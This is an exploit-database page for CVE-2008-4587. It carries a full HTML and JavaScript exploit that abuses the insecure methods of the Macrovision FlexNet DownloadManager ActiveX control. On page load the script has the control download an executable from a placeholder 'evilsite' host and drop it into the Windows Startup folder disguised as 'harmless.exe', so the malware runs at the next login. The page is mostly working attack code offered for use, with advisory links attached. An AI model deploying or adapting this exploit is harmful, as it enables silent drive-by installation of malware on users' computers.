Bug: Macrovision FlexNet DownloadManager Insecure Methods Exploit (WLB-2008100051 Ascii Version)

English Version
WLB2

CVE WLB2

WLB2
Full List
Bugs
Bogus
Tricks
Exploits
CVE MAP
Full List
Vendors
Products
Tools
CWE Dictionary
Google Hacking
Search
General
CVE
CWE
RSS
Full List
Bugs
Exploits
Dorks
Information
Our services
Add note
About
Submit

To add a note,

use this form

or send email to

submit@cxsecurity.com

When contacting via email, we recommend coded messages.

Get our PGP public key

 Topic: Macrovision FlexNet DownloadManager Insecure Methods Exploit
 Credit: e.b.
 Date: 2008.10.18
 CWE: CWE-Other (Show similar)
 CVE: CVE-2008-4587 (Show details)

Use CVE to see details like:
- CVSS2,
- Affected Software,
- References

Risk
Local
Remote
High
No
Yes

<!--
Macrovision FlexNet DownloadManager Insecure Methods Exploit
Implemented Categories:
Category: Safe for Scripting
Written by e.b.
Tested on Windows XP SP2(fully patched) English, IE6, ISDM.exe version 6.1.100.61372
-->
<html>
<head>
<title>Macrovision FlexNet DownloadManager Insecure Methods Exploit</title>
<script language="JavaScript" defer>
function Check() {

var mJob = obj.CreateJob("SomeJob",0,"{11111111-1111-1111-1111-111111111111}");

mJob.AddFile("http://www.evilsite/evil.exe","C:\\Documents and Settings\\All Users\\Start
Menu\\Programs\\Startup\\harmless.exe");
mJob.SetPriority(0);
mJob.SetNotifyFlags(2);
mJob.ScheduleInterval = 2;

obj.RunScheduledJobs();


}

</script>
</head>
<body onload="JavaScript: return Check();">
<object id="obj" classid="clsid:FCED4482-7CCB-4E6F-86C9-DCB22B52843C" height="0"
width="0">
Unable to create object
</object>
</body>
</html>

References:

http://xforce.iss.net/xforce/xfdb/39653
http://www.securityfocus.com/bid/27279
http://www.milw0rm.com/exploits/4909
http://secunia.com/advisories/28496

[ ASCII VERSION ]
Copyright 2012, cxsecurity.com